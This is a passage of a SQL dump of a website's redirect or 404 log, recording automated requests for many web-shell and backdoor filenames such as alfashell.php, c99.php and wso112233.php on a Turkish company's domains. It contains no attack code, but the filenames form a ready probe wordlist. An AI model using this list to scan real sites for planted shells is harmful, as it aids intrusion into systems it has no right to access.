00:00:00',301),(56738,'http://3s-technologies.com.tr/tr/wordpress/dashboard.php',NULL,'','',1,0,'2026-02-04 11:07:47','0000-00-00 00:00:00',301),(56739,'http://3s-technologies.com.tr/tr/.well-known/plugins',NULL,'','',1,0,'2026-02-04 11:07:48','0000-00-00 00:00:00',301),(56740,'http://3s-technologies.com.tr/tr/production.php',NULL,'','',1,0,'2026-02-04 11:07:49','0000-00-00 00:00:00',301),(56741,'http://3s-technologies.com.tr/tr/home/cloud.php',NULL,'','',1,0,'2026-02-04 11:08:10','0000-00-00 00:00:00',301),(56742,'http://3s-technologies.com.tr/tr/public/vx.php',NULL,'','',34,0,'2026-02-04 13:51:48','0000-00-00 00:00:00',301),(56743,'http://3s-technologies.com.tr/en/wxfxdijc.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2026-02-05 03:51:45','0000-00-00 00:00:00',301),(56744,'https://3s-technologies.com.tr/en/rjwpsdgj.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2026-02-05 03:51:46','0000-00-00 00:00:00',301),(56745,'https://3s-technologies.com.tr/tr/wp-json/wc/store/cart',NULL,'https://3s-technologies.com.tr/wp-json/wc/store/cart','',1,0,'2026-02-05 07:41:34','0000-00-00 00:00:00',301),(56746,'http://mail.3s-technologies.com.tr/tr/ws64.php',NULL,'','',1,0,'2026-02-05 12:37:21','0000-00-00 00:00:00',301),(56747,'http://mail.3s-technologies.com.tr/tr/bay11.php',NULL,'','',1,0,'2026-02-05 12:37:22','0000-00-00 00:00:00',301),(56748,'http://mail.3s-technologies.com.tr/tr/zc-845.php',NULL,'','',1,0,'2026-02-05 12:37:24','0000-00-00 00:00:00',301),(56749,'http://mail.3s-technologies.com.tr/tr/wsdxoeas.php',NULL,'','',1,0,'2026-02-05 12:37:25','0000-00-00 00:00:00',301),(56750,'http://mail.3s-technologies.com.tr/tr/star.php',NULL,'','',1,0,'2026-02-05 12:37:29','0000-00-00 00:00:00',301),(56751,'http://mail.3s-technologies.com.tr/tr/timocra.php',NULL,'','',1,0,'2026-02-05 12:37:31','0000-00-00 00:00:00',301),(56752,'http://mail.3s-technologies.com.tr/tr/w3llscc - copy.php7',NULL,'','',1,0,'2026-02-05 12:37:37','0000-00-00 00:00:00',301),(56753,'http://mail.3s-technologies.com.tr/tr/wp-shirei.php',NULL,'','',1,0,'2026-02-05 12:37:41','0000-00-00 00:00:00',301),(56754,'http://mail.3s-technologies.com.tr/tr/hlonk.php',NULL,'','',1,0,'2026-02-05 12:37:42','0000-00-00 00:00:00',301),(56755,'http://mail.3s-technologies.com.tr/tr/htio.php',NULL,'','',1,0,'2026-02-05 12:37:48','0000-00-00 00:00:00',301),(56756,'http://mail.3s-technologies.com.tr/tr/xy.php',NULL,'','',15,0,'2026-02-05 12:37:49','0000-00-00 00:00:00',301),(56757,'http://mail.3s-technologies.com.tr/tr/cah.php',NULL,'','',4,0,'2026-02-05 12:37:59','0000-00-00 00:00:00',301),(56758,'http://mail.3s-technologies.com.tr/tr/rzki.php',NULL,'','',12,0,'2026-02-05 12:38:07','0000-00-00 00:00:00',301),(56759,'http://mail.3s-technologies.com.tr/tr/wp-ann.php',NULL,'','',1,0,'2026-02-05 12:38:15','0000-00-00 00:00:00',301),(56760,'http://mail.3s-technologies.com.tr/tr/yawa.php',NULL,'','',4,0,'2026-02-05 12:38:17','0000-00-00 00:00:00',301),(56761,'http://mail.3s-technologies.com.tr/tr/ziwopudm.php',NULL,'','',1,0,'2026-02-05 12:38:21','0000-00-00 00:00:00',301),(56762,'http://mail.3s-technologies.com.tr/tr/cczkdmdy.php',NULL,'','',1,0,'2026-02-05 12:38:26','0000-00-00 00:00:00',301),(56763,'http://mail.3s-technologies.com.tr/tr/wbbw.php',NULL,'','',2,0,'2026-02-05 12:38:27','0000-00-00 00:00:00',301),(56764,'http://mail.3s-technologies.com.tr/tr/alfashell.php',NULL,'','',18,0,'2026-02-05 12:38:29','0000-00-00 00:00:00',301),(56765,'http://mail.3s-technologies.com.tr/tr/aboutc.php',NULL,'','',11,0,'2026-02-05 12:38:33','0000-00-00 00:00:00',301),(56766,'http://mail.3s-technologies.com.tr/tr/living.php',NULL,'','',1,0,'2026-02-05 12:38:43','0000-00-00 00:00:00',301),(56767,'http://mail.3s-technologies.com.tr/tr/yaiid.php',NULL,'','',3,0,'2026-02-05 12:38:47','0000-00-00 00:00:00',301),(56768,'http://mail.3s-technologies.com.tr/tr/zzxy.php',NULL,'','',2,0,'2026-02-05 12:38:48','0000-00-00 00:00:00',301),(56769,'http://mail.3s-technologies.com.tr/tr/wp-4doption1.php',NULL,'','',5,0,'2026-02-05 12:38:52','0000-00-00 00:00:00',301),(56770,'http://mail.3s-technologies.com.tr/tr/kdgok.php',NULL,'','',2,0,'2026-02-05 12:38:54','0000-00-00 00:00:00',301),(56771,'http://mail.3s-technologies.com.tr/tr/fck.php',NULL,'','',5,0,'2026-02-05 12:39:01','0000-00-00 00:00:00',301),(56772,'http://mail.3s-technologies.com.tr/tr/hilk.php',NULL,'','',2,0,'2026-02-05 12:39:04','0000-00-00 00:00:00',301),(56773,'http://mail.3s-technologies.com.tr/tr/w3llscc.php7',NULL,'','',2,0,'2026-02-05 12:39:05','0000-00-00 00:00:00',301),(56774,'http://mail.3s-technologies.com.tr/tr/wp-ait.php',NULL,'','',1,0,'2026-02-05 12:39:12','0000-00-00 00:00:00',301),(56775,'http://mail.3s-technologies.com.tr/tr/xxm.php',NULL,'','',1,0,'2026-02-05 12:39:15','0000-00-00 00:00:00',301),(56776,'http://mail.3s-technologies.com.tr/tr/w3lls.php7',NULL,'','',3,0,'2026-02-05 12:39:18','0000-00-00 00:00:00',301),(56777,'http://mail.3s-technologies.com.tr/tr/yifsx.php',NULL,'','',2,0,'2026-02-05 12:39:22','0000-00-00 00:00:00',301),(56778,'http://mail.3s-technologies.com.tr/tr/sym403.php',NULL,'','',4,0,'2026-02-05 12:39:23','0000-00-00 00:00:00',301),(56779,'http://mail.3s-technologies.com.tr/tr/rum.php',NULL,'','',4,0,'2026-02-05 12:39:27','0000-00-00 00:00:00',301),(56780,'http://mail.3s-technologies.com.tr/tr/aq.php',NULL,'','',9,0,'2026-02-05 12:39:35','0000-00-00 00:00:00',301),(56781,'http://mail.3s-technologies.com.tr/tr/lock2.php',NULL,'','',1,0,'2026-02-05 12:39:36','0000-00-00 00:00:00',301),(56782,'http://mail.3s-technologies.com.tr/tr/sim.php',NULL,'','',2,0,'2026-02-05 12:39:43','0000-00-00 00:00:00',301),(56783,'http://www.3s-technologies.com.tr/tr/ms-edit.php',NULL,'','',15,0,'2026-02-06 03:00:21','0000-00-00 00:00:00',301),(56784,'http://3s-technologies.com.tr/tr/sudo.php',NULL,'','',1,0,'2026-02-06 04:26:04','0000-00-00 00:00:00',301),(56785,'http://3s-technologies.com.tr/tr/whm-cp.php',NULL,'','',1,0,'2026-02-06 04:26:10','0000-00-00 00:00:00',301),(56786,'http://3s-technologies.com.tr/tr/za2.php',NULL,'','',1,0,'2026-02-06 04:26:11','0000-00-00 00:00:00',301),(56787,'http://3s-technologies.com.tr/tr/gmanz.php',NULL,'','',1,0,'2026-02-06 04:26:13','0000-00-00 00:00:00',301),(56788,'http://3s-technologies.com.tr/tr/wp-includes/requests/library/shlo.php',NULL,'','',1,0,'2026-02-06 04:26:16','0000-00-00 00:00:00',301),(56789,'http://3s-technologies.com.tr/tr/bs5.php',NULL,'','',1,0,'2026-02-06 04:26:17','0000-00-00 00:00:00',301),(56790,'http://3s-technologies.com.tr/tr/ednse.php',NULL,'','',1,0,'2026-02-06 04:26:17','0000-00-00 00:00:00',301),(56791,'http://3s-technologies.com.tr/tr/niett.php',NULL,'','',1,0,'2026-02-06 04:26:18','0000-00-00 00:00:00',301),(56792,'http://3s-technologies.com.tr/tr/puibr.php',NULL,'','',1,0,'2026-02-06 04:26:19','0000-00-00 00:00:00',301),(56793,'http://3s-technologies.com.tr/tr/smp.php',NULL,'','',1,0,'2026-02-06 04:26:20','0000-00-00 00:00:00',301),(56794,'http://3s-technologies.com.tr/tr/block-support.php',NULL,'','',2,0,'2026-02-06 04:38:02','0000-00-00 00:00:00',301),(56795,'http://3s-technologies.com.tr/tr/landing.php',NULL,'','',1,0,'2026-02-06 04:38:20','0000-00-00 00:00:00',301),(56796,'http://3s-technologies.com.tr/tr/1750714344_admin.php',NULL,'','',1,0,'2026-02-06 04:38:43','0000-00-00 00:00:00',301),(56797,'https://3s-technologies.com.tr/tr/ai.txt',NULL,'','',1,0,'2026-02-06 05:37:29','0000-00-00 00:00:00',301),(56798,'http://www.3s-technologies.com.tr/tr/166.php',NULL,'','',13,0,'2026-02-06 13:25:39','0000-00-00 00:00:00',301),(56799,'http://www.3s-technologies.com.tr/tr/2026.php',NULL,'','',2,0,'2026-02-06 13:25:40','0000-00-00 00:00:00',301),(56800,'http://www.3s-technologies.com.tr/tr/muzu.php',NULL,'','',2,0,'2026-02-06 13:25:41','0000-00-00 00:00:00',301),(56801,'http://www.3s-technologies.com.tr/tr/reze.php',NULL,'','',4,0,'2026-02-06 13:25:41','0000-00-00 00:00:00',301),(56802,'http://www.3s-technologies.com.tr/tr/jsond.php',NULL,'','',3,0,'2026-02-06 13:25:42','0000-00-00 00:00:00',301),(56803,'http://www.3s-technologies.com.tr/tr/tphp.php',NULL,'','',2,0,'2026-02-06 13:25:46','0000-00-00 00:00:00',301),(56804,'http://www.3s-technologies.com.tr/tr/nyan.php',NULL,'','',2,0,'2026-02-06 13:25:48','0000-00-00 00:00:00',301),(56805,'http://www.3s-technologies.com.tr/tr/update/wpupex.php',NULL,'','',3,0,'2026-02-06 13:25:50','0000-00-00 00:00:00',301),(56806,'http://www.3s-technologies.com.tr/tr/rezor.php',NULL,'','',2,0,'2026-02-06 13:25:50','0000-00-00 00:00:00',301),(56807,'http://www.3s-technologies.com.tr/tr/~norapump/hah.php',NULL,'','',2,0,'2026-02-06 13:25:54','0000-00-00 00:00:00',301),(56808,'http://www.3s-technologies.com.tr/tr/wp-includes/blocks',NULL,'','',2,0,'2026-02-06 13:25:56','0000-00-00 00:00:00',301),(56809,'http://www.3s-technologies.com.tr/tr/.trash7309/f',NULL,'','',2,0,'2026-02-06 13:26:00','0000-00-00 00:00:00',301),(56810,'http://www.3s-technologies.com.tr/tr/skin/install/default/security.php',NULL,'','',2,0,'2026-02-06 13:26:02','0000-00-00 00:00:00',301),(56811,'http://www.3s-technologies.com.tr/tr/wp-includes/css',NULL,'','',2,0,'2026-02-06 13:26:03','0000-00-00 00:00:00',301),(56812,'http://www.3s-technologies.com.tr/tr/images/c99.php',NULL,'','',3,0,'2026-02-06 13:26:04','0000-00-00 00:00:00',301),(56813,'http://www.3s-technologies.com.tr/tr/wp/wp-includes/index.php',NULL,'','',2,0,'2026-02-06 13:26:10','0000-00-00 00:00:00',301),(56814,'http://www.3s-technologies.com.tr/tr/images/fk2e3',NULL,'','',2,0,'2026-02-06 13:26:14','0000-00-00 00:00:00',301),(56815,'http://www.3s-technologies.com.tr/tr/wp-includes/ixr/moon.php',NULL,'','',2,0,'2026-02-06 13:26:15','0000-00-00 00:00:00',301),(56816,'http://www.3s-technologies.com.tr/tr/sxo.php',NULL,'','',2,0,'2026-02-06 13:26:16','0000-00-00 00:00:00',301),(56817,'http://www.3s-technologies.com.tr/tr/wp-admin',NULL,'','',2,0,'2026-02-06 13:26:16','0000-00-00 00:00:00',301),(56818,'http://www.3s-technologies.com.tr/tr/wordpress/x',NULL,'','',2,0,'2026-02-06 13:26:18','0000-00-00 00:00:00',301),(56819,'http://www.3s-technologies.com.tr/tr/cool.php',NULL,'','',1,0,'2026-02-06 13:26:24','0000-00-00 00:00:00',301),(56820,'http://www.3s-technologies.com.tr/tr/.trash7309/fafa',NULL,'','',2,0,'2026-02-06 13:26:28','0000-00-00 00:00:00',301),(56821,'http://www.3s-technologies.com.tr/tr/wp-admin/maint',NULL,'','',3,0,'2026-02-06 13:26:29','0000-00-00 00:00:00',301),(56822,'http://www.3s-technologies.com.tr/tr/wp-admin/network',NULL,'','',2,0,'2026-02-06 13:26:30','0000-00-00 00:00:00',301),(56823,'http://www.3s-technologies.com.tr/tr/museu/yhweq.php',NULL,'','',2,0,'2026-02-06 13:26:30','0000-00-00 00:00:00',301),(56824,'http://www.3s-technologies.com.tr/tr/gib.php',NULL,'','',2,0,'2026-02-06 13:26:32','0000-00-00 00:00:00',301),(56825,'http://www.3s-technologies.com.tr/tr/wp-miiss.php.php',NULL,'','',2,0,'2026-02-06 13:26:33','0000-00-00 00:00:00',301),(56826,'http://www.3s-technologies.com.tr/tr/ho/wpup.php',NULL,'','',3,0,'2026-02-06 13:26:33','0000-00-00 00:00:00',301),(56827,'http://www.3s-technologies.com.tr/tr/hey.php',NULL,'','',2,0,'2026-02-06 13:26:35','0000-00-00 00:00:00',301),(56828,'http://www.3s-technologies.com.tr/tr/apsarasarts/okk.php',NULL,'','',2,0,'2026-02-06 13:26:37','0000-00-00 00:00:00',301),(56829,'http://www.3s-technologies.com.tr/tr/bnn_.php',NULL,'','',3,0,'2026-02-06 13:26:40','0000-00-00 00:00:00',301),(56830,'http://www.3s-technologies.com.tr/tr/hzz.php',NULL,'','',2,0,'2026-02-06 13:26:42','0000-00-00 00:00:00',301),(56831,'http://www.3s-technologies.com.tr/tr/ps.php',NULL,'','',1,0,'2026-02-06 13:26:44','0000-00-00 00:00:00',301),(56832,'http://www.3s-technologies.com.tr/tr/.trash7309/dd',NULL,'','',2,0,'2026-02-06 13:26:45','0000-00-00 00:00:00',301),(56833,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/achdxhv/languages/admin.php',NULL,'','',2,0,'2026-02-06 13:26:47','0000-00-00 00:00:00',301),(56834,'http://www.3s-technologies.com.tr/tr/wp-includes/block-patterns',NULL,'','',2,0,'2026-02-06 13:26:48','0000-00-00 00:00:00',301),(56835,'http://www.3s-technologies.com.tr/tr/wp4.php',NULL,'','',3,0,'2026-02-06 13:26:50','0000-00-00 00:00:00',301),(56836,'http://www.3s-technologies.com.tr/tr/sad/about.php',NULL,'','',5,0,'2026-02-06 13:26:53','0000-00-00 00:00:00',301),(56837,'http://www.3s-technologies.com.tr/tr/oivcl.php',NULL,'','',2,0,'2026-02-06 13:26:54','0000-00-00 00:00:00',301),(56838,'http://www.3s-technologies.com.tr/tr/x',NULL,'','',2,0,'2026-02-06 13:26:57','0000-00-00 00:00:00',301),(56839,'http://www.3s-technologies.com.tr/tr/.cache/x.php',NULL,'','',2,0,'2026-02-06 13:26:57','0000-00-00 00:00:00',301),(56840,'http://www.3s-technologies.com.tr/tr/dr.php',NULL,'','',2,0,'2026-02-06 13:26:58','0000-00-00 00:00:00',301),(56841,'http://www.3s-technologies.com.tr/tr/packed.php',NULL,'','',2,0,'2026-02-06 13:27:04','0000-00-00 00:00:00',301),(56842,'http://www.3s-technologies.com.tr/tr/des.php',NULL,'','',2,0,'2026-02-06 13:27:05','0000-00-00 00:00:00',301),(56843,'http://www.3s-technologies.com.tr/tr/.well-known/content.php',NULL,'','',1,0,'2026-02-06 13:27:05','0000-00-00 00:00:00',301),(56844,'http://mail.3s-technologies.com.tr/tr/wwx.php',NULL,'','',4,0,'2026-02-06 14:20:35','0000-00-00 00:00:00',301),(56845,'http://mail.3s-technologies.com.tr/tr/uploaxa1.php',NULL,'','',2,0,'2026-02-06 14:20:36','0000-00-00 00:00:00',301),(56846,'http://mail.3s-technologies.com.tr/tr/rzzaq.php',NULL,'','',2,0,'2026-02-06 14:20:37','0000-00-00 00:00:00',301),(56847,'http://mail.3s-technologies.com.tr/tr/ayucf.php',NULL,'','',1,0,'2026-02-06 14:20:54','0000-00-00 00:00:00',301),(56848,'http://mail.3s-technologies.com.tr/tr/aiyum.php',NULL,'','',1,0,'2026-02-06 14:20:55','0000-00-00 00:00:00',301),(56849,'http://mail.3s-technologies.com.tr/tr/geforce.php',NULL,'','',24,0,'2026-02-06 14:20:56','0000-00-00 00:00:00',301),(56850,'http://mail.3s-technologies.com.tr/tr/adywi.php',NULL,'','',1,0,'2026-02-06 14:20:56','0000-00-00 00:00:00',301),(56851,'http://mail.3s-technologies.com.tr/tr/ewyuc.php',NULL,'','',1,0,'2026-02-06 14:20:58','0000-00-00 00:00:00',301),(56852,'http://mail.3s-technologies.com.tr/tr/ws63.php',NULL,'','',1,0,'2026-02-06 14:20:58','0000-00-00 00:00:00',301),(56853,'http://mail.3s-technologies.com.tr/tr/wp_abu0g1ys.php',NULL,'','',1,0,'2026-02-06 14:20:59','0000-00-00 00:00:00',301),(56854,'http://mail.3s-technologies.com.tr/tr/ajjxy.php',NULL,'','',1,0,'2026-02-06 14:21:00','0000-00-00 00:00:00',301),(56855,'http://mail.3s-technologies.com.tr/tr/isrfw.php',NULL,'','',1,0,'2026-02-06 14:21:01','0000-00-00 00:00:00',301),(56856,'http://mail.3s-technologies.com.tr/tr/nxzzg.php',NULL,'','',1,0,'2026-02-06 14:21:01','0000-00-00 00:00:00',301),(56857,'http://mail.3s-technologies.com.tr/tr/init.php',NULL,'','',36,0,'2026-02-06 14:21:02','0000-00-00 00:00:00',301),(56858,'http://mail.3s-technologies.com.tr/tr/63d1b1d0f4.php',NULL,'','',1,0,'2026-02-06 14:21:03','0000-00-00 00:00:00',301),(56859,'http://mail.3s-technologies.com.tr/tr/imdex.php',NULL,'','',1,0,'2026-02-06 14:21:04','0000-00-00 00:00:00',301),(56860,'http://mail.3s-technologies.com.tr/tr/cxcx.php',NULL,'','',1,0,'2026-02-06 14:21:04','0000-00-00 00:00:00',301),(56861,'http://mail.3s-technologies.com.tr/tr/acehj.php',NULL,'','',1,0,'2026-02-06 14:21:06','0000-00-00 00:00:00',301),(56862,'http://mail.3s-technologies.com.tr/tr/impat.php',NULL,'','',1,0,'2026-02-06 14:21:06','0000-00-00 00:00:00',301),(56863,'http://mail.3s-technologies.com.tr/tr/loginstyle.php',NULL,'','',1,0,'2026-02-06 14:21:07','0000-00-00 00:00:00',301),(56864,'http://mail.3s-technologies.com.tr/tr/mcien14tek9.php',NULL,'','',1,0,'2026-02-06 14:21:08','0000-00-00 00:00:00',301),(56865,'http://mail.3s-technologies.com.tr/tr/bzwgm.php',NULL,'','',1,0,'2026-02-06 14:21:09','0000-00-00 00:00:00',301),(56866,'http://mail.3s-technologies.com.tr/tr/bfynl.php',NULL,'','',1,0,'2026-02-06 14:21:09','0000-00-00 00:00:00',301),(56867,'http://mail.3s-technologies.com.tr/tr/bdimq.php',NULL,'','',1,0,'2026-02-06 14:21:10','0000-00-00 00:00:00',301),(56868,'http://mail.3s-technologies.com.tr/tr/pass4.php',NULL,'','',21,0,'2026-02-06 14:21:11','0000-00-00 00:00:00',301),(56869,'http://mail.3s-technologies.com.tr/tr/yymlnhet.php',NULL,'','',1,0,'2026-02-06 14:21:12','0000-00-00 00:00:00',301),(56870,'http://mail.3s-technologies.com.tr/tr/wqxbs.php',NULL,'','',1,0,'2026-02-06 14:21:12','0000-00-00 00:00:00',301),(56871,'http://mail.3s-technologies.com.tr/tr/edorxrr.php',NULL,'','',1,0,'2026-02-06 14:21:13','0000-00-00 00:00:00',301),(56872,'http://mail.3s-technologies.com.tr/tr/hega.php',NULL,'','',1,0,'2026-02-06 14:21:14','0000-00-00 00:00:00',301),(56873,'http://mail.3s-technologies.com.tr/tr/error_log.php',NULL,'','',14,0,'2026-02-06 14:21:14','0000-00-00 00:00:00',301),(56874,'http://mail.3s-technologies.com.tr/tr/h02ugyh.php',NULL,'','',13,0,'2026-02-06 14:21:16','0000-00-00 00:00:00',301),(56875,'http://mail.3s-technologies.com.tr/tr/tipi.php',NULL,'','',1,0,'2026-02-06 14:21:16','0000-00-00 00:00:00',301),(56876,'http://mail.3s-technologies.com.tr/tr/mlc0wi7m.php',NULL,'','',1,0,'2026-02-06 14:21:17','0000-00-00 00:00:00',301),(56877,'http://mail.3s-technologies.com.tr/tr/kly1.php',NULL,'','',1,0,'2026-02-06 14:21:18','0000-00-00 00:00:00',301),(56878,'http://mail.3s-technologies.com.tr/tr/ilxrz.php',NULL,'','',1,0,'2026-02-06 14:21:19','0000-00-00 00:00:00',301),(56879,'http://mail.3s-technologies.com.tr/tr/hhxmpnlltkf.php',NULL,'','',1,0,'2026-02-06 14:21:20','0000-00-00 00:00:00',301),(56880,'http://mail.3s-technologies.com.tr/tr/xs.php',NULL,'','',22,0,'2026-02-06 14:21:21','0000-00-00 00:00:00',301),(56881,'http://mail.3s-technologies.com.tr/tr/ikiox.php',NULL,'','',1,0,'2026-02-06 14:21:21','0000-00-00 00:00:00',301),(56882,'http://mail.3s-technologies.com.tr/tr/gp594e8u.php',NULL,'','',1,0,'2026-02-06 14:21:22','0000-00-00 00:00:00',301),(56883,'http://mail.3s-technologies.com.tr/tr/wp_rwbhdxo4.php',NULL,'','',1,0,'2026-02-06 14:21:24','0000-00-00 00:00:00',301),(56884,'http://mail.3s-technologies.com.tr/tr/itdgb.php',NULL,'','',1,0,'2026-02-06 14:21:25','0000-00-00 00:00:00',301),(56885,'http://mail.3s-technologies.com.tr/tr/slot.php',NULL,'','',1,0,'2026-02-06 14:21:27','0000-00-00 00:00:00',301),(56886,'http://mail.3s-technologies.com.tr/tr/yyfj34j6.php',NULL,'','',1,0,'2026-02-06 14:21:28','0000-00-00 00:00:00',301),(56887,'http://mail.3s-technologies.com.tr/tr/abjxo.php',NULL,'','',1,0,'2026-02-06 14:21:29','0000-00-00 00:00:00',301),(56888,'http://mail.3s-technologies.com.tr/tr/81ytzrds.php',NULL,'','',1,0,'2026-02-06 14:21:30','0000-00-00 00:00:00',301),(56889,'http://mail.3s-technologies.com.tr/tr/xclix.php',NULL,'','',1,0,'2026-02-06 14:21:31','0000-00-00 00:00:00',301),(56890,'http://mail.3s-technologies.com.tr/tr/ccqxq.php',NULL,'','',1,0,'2026-02-06 14:21:32','0000-00-00 00:00:00',301),(56891,'http://mail.3s-technologies.com.tr/tr/gboah.php',NULL,'','',1,0,'2026-02-06 14:21:33','0000-00-00 00:00:00',301),(56892,'http://mail.3s-technologies.com.tr/tr/ayxws.php',NULL,'','',1,0,'2026-02-06 14:21:33','0000-00-00 00:00:00',301),(56893,'http://mail.3s-technologies.com.tr/tr/whntt85c.php',NULL,'','',1,0,'2026-02-06 14:21:34','0000-00-00 00:00:00',301),(56894,'http://mail.3s-technologies.com.tr/tr/l3pencxvrh1.php',NULL,'','',1,0,'2026-02-06 14:21:35','0000-00-00 00:00:00',301),(56895,'http://mail.3s-technologies.com.tr/tr/opined.php',NULL,'','',1,0,'2026-02-06 14:21:35','0000-00-00 00:00:00',301),(56896,'http://mail.3s-technologies.com.tr/tr/il.php',NULL,'','',2,0,'2026-02-06 14:21:36','0000-00-00 00:00:00',301),(56897,'http://mail.3s-technologies.com.tr/tr/0byte.php',NULL,'','',9,0,'2026-02-06 14:21:37','0000-00-00 00:00:00',301),(56898,'http://mail.3s-technologies.com.tr/tr/axlgh.php',NULL,'','',1,0,'2026-02-06 14:21:38','0000-00-00 00:00:00',301),(56899,'http://mail.3s-technologies.com.tr/tr/cllla.php',NULL,'','',1,0,'2026-02-06 14:21:38','0000-00-00 00:00:00',301),(56900,'http://mail.3s-technologies.com.tr/tr/symilink.php',NULL,'','',1,0,'2026-02-06 14:21:39','0000-00-00 00:00:00',301),(56901,'http://mail.3s-technologies.com.tr/tr/iabbh.php',NULL,'','',1,0,'2026-02-06 14:21:43','0000-00-00 00:00:00',301),(56902,'http://mail.3s-technologies.com.tr/tr/o8dwkqyb.php',NULL,'','',1,0,'2026-02-06 14:21:44','0000-00-00 00:00:00',301),(56903,'http://mail.3s-technologies.com.tr/tr/jqaolfmr.php',NULL,'','',1,0,'2026-02-06 14:21:44','0000-00-00 00:00:00',301),(56904,'http://mail.3s-technologies.com.tr/tr/common.php',NULL,'','',2,0,'2026-02-06 14:21:45','0000-00-00 00:00:00',301),(56905,'http://mail.3s-technologies.com.tr/tr/ah25.php',NULL,'','',18,0,'2026-02-06 14:21:46','0000-00-00 00:00:00',301),(56906,'http://mail.3s-technologies.com.tr/tr/delall.php',NULL,'','',1,0,'2026-02-06 14:21:46','0000-00-00 00:00:00',301),(56907,'http://mail.3s-technologies.com.tr/tr/unzip.php',NULL,'','',1,0,'2026-02-06 14:21:47','0000-00-00 00:00:00',301),(56908,'http://mail.3s-technologies.com.tr/tr/ahhir.php',NULL,'','',1,0,'2026-02-06 14:21:48','0000-00-00 00:00:00',301),(56909,'http://mail.3s-technologies.com.tr/tr/jumboinstallations.com:80.php',NULL,'','',1,0,'2026-02-06 14:21:48','0000-00-00 00:00:00',301),(56910,'http://mail.3s-technologies.com.tr/tr/s63ytogp.php',NULL,'','',1,0,'2026-02-06 14:21:51','0000-00-00 00:00:00',301),(56911,'http://mail.3s-technologies.com.tr/tr/w2025.php',NULL,'','',17,0,'2026-02-06 14:21:52','0000-00-00 00:00:00',301),(56912,'http://mail.3s-technologies.com.tr/tr/tbpqh.php',NULL,'','',1,0,'2026-02-06 14:21:53','0000-00-00 00:00:00',301),(56913,'http://mail.3s-technologies.com.tr/tr/wp_mrcu3tcq.php',NULL,'','',1,0,'2026-02-06 14:21:56','0000-00-00 00:00:00',301),(56914,'http://mail.3s-technologies.com.tr/tr/kjh.php',NULL,'','',2,0,'2026-02-06 14:21:57','0000-00-00 00:00:00',301),(56915,'http://mail.3s-technologies.com.tr/tr/cc13.php',NULL,'','',13,0,'2026-02-06 14:21:58','0000-00-00 00:00:00',301),(56916,'http://mail.3s-technologies.com.tr/tr/bvspq.php',NULL,'','',1,0,'2026-02-06 14:21:59','0000-00-00 00:00:00',301),(56917,'http://mail.3s-technologies.com.tr/tr/bootstrap.php',NULL,'','',17,0,'2026-02-06 14:22:00','0000-00-00 00:00:00',301),(56918,'http://mail.3s-technologies.com.tr/tr/xl9.php',NULL,'','',2,0,'2026-02-06 14:22:01','0000-00-00 00:00:00',301),(56919,'http://www.3s-technologies.com.tr/tr/wwx.php',NULL,'','',2,0,'2026-02-06 14:38:04','0000-00-00 00:00:00',301),(56920,'http://www.3s-technologies.com.tr/tr/uploaxa1.php',NULL,'','',1,0,'2026-02-06 14:38:05','0000-00-00 00:00:00',301),(56921,'http://www.3s-technologies.com.tr/tr/rzzaq.php',NULL,'','',1,0,'2026-02-06 14:38:06','0000-00-00 00:00:00',301),(56922,'https://3s-technologies.com.tr/tr/wp-json/wc/store/v1',NULL,'','',1,0,'2026-02-06 16:09:37','0000-00-00 00:00:00',301),(56923,'http://3s-technologies.com.tr/tr/wp-json/wc/store/v1',NULL,'','',1,0,'2026-02-06 16:09:38','0000-00-00 00:00:00',301),(56924,'http://3s-technologies.com.tr/tr/v2_xml.php',NULL,'','',2,0,'2026-02-06 18:37:35','0000-00-00 00:00:00',301),(56925,'http://3s-technologies.com.tr/tr/ya.php',NULL,'','',8,0,'2026-02-06 18:37:36','0000-00-00 00:00:00',301),(56926,'http://3s-technologies.com.tr/tr/odr.php',NULL,'','',2,0,'2026-02-06 18:37:38','0000-00-00 00:00:00',301),(56927,'http://3s-technologies.com.tr/tr/ftem.php',NULL,'','',5,0,'2026-02-06 18:37:38','0000-00-00 00:00:00',301),(56928,'http://3s-technologies.com.tr/tr/a1vx.php',NULL,'','',21,0,'2026-02-06 18:37:40','0000-00-00 00:00:00',301),(56929,'http://3s-technologies.com.tr/tr/sbhu.php',NULL,'','',84,0,'2026-02-06 18:37:41','0000-00-00 00:00:00',301),(56930,'http://3s-technologies.com.tr/tr/wp-the.php',NULL,'','',104,0,'2026-02-06 18:37:42','0000-00-00 00:00:00',301),(56931,'http://3s-technologies.com.tr/tr/wp5.php',NULL,'','',52,0,'2026-02-06 18:37:44','0000-00-00 00:00:00',301),(56932,'http://3s-technologies.com.tr/tr/fot.php',NULL,'','',11,0,'2026-02-06 18:37:46','0000-00-00 00:00:00',301),(56933,'http://3s-technologies.com.tr/tr/x--krood.php',NULL,'','',2,0,'2026-02-06 18:37:46','0000-00-00 00:00:00',301),(56934,'http://3s-technologies.com.tr/tr/ff1.php',NULL,'','',60,0,'2026-02-06 18:37:47','0000-00-00 00:00:00',301),(56935,'http://3s-technologies.com.tr/tr/forbidals.php',NULL,'','',24,0,'2026-02-06 18:37:48','0000-00-00 00:00:00',301),(56936,'http://3s-technologies.com.tr/tr/vdb.php',NULL,'','',3,0,'2026-02-06 18:37:49','0000-00-00 00:00:00',301),(56937,'http://3s-technologies.com.tr/tr/erty.php',NULL,'','',55,0,'2026-02-06 18:37:50','0000-00-00 00:00:00',301),(56938,'http://3s-technologies.com.tr/tr/ffd.php',NULL,'','',13,0,'2026-02-06 18:37:51','0000-00-00 00:00:00',301),(56939,'http://3s-technologies.com.tr/tr/anna.php',NULL,'','',2,0,'2026-02-06 18:37:52','0000-00-00 00:00:00',301),(56940,'http://3s-technologies.com.tr/tr/fi.php',NULL,'','',51,0,'2026-02-06 18:38:43','0000-00-00 00:00:00',301),(56941,'http://mail.3s-technologies.com.tr/tr/engine.php',NULL,'','',3,0,'2026-02-06 21:23:49','0000-00-00 00:00:00',301),(56942,'http://mail.3s-technologies.com.tr/tr/im.php',NULL,'','',2,0,'2026-02-06 21:23:54','0000-00-00 00:00:00',301),(56943,'http://mail.3s-technologies.com.tr/tr/wp-info.php',NULL,'','',13,0,'2026-02-06 21:24:00','0000-00-00 00:00:00',301),(56944,'http://mail.3s-technologies.com.tr/tr/setup-config.php',NULL,'','',2,0,'2026-02-06 21:24:01','0000-00-00 00:00:00',301),(56945,'http://mail.3s-technologies.com.tr/tr/wso112233.php',NULL,'','',3,0,'2026-02-06 21:24:09','0000-00-00 00:00:00',301),(56946,'http://3s-technologies.com.tr/tr/grsiuk.php',NULL,'','',57,0,'2026-02-07 